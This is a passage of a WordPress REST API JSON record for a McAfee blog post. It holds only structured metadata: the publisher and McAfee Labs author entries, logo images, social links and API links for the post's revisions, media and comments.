News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=187631"}],"version-history":[{"count":9,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631\/revisions"}],"predecessor-version":[{"id":188150,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/187631\/revisions\/188150"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/188086"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=187631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=187631"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=187631"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=187631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}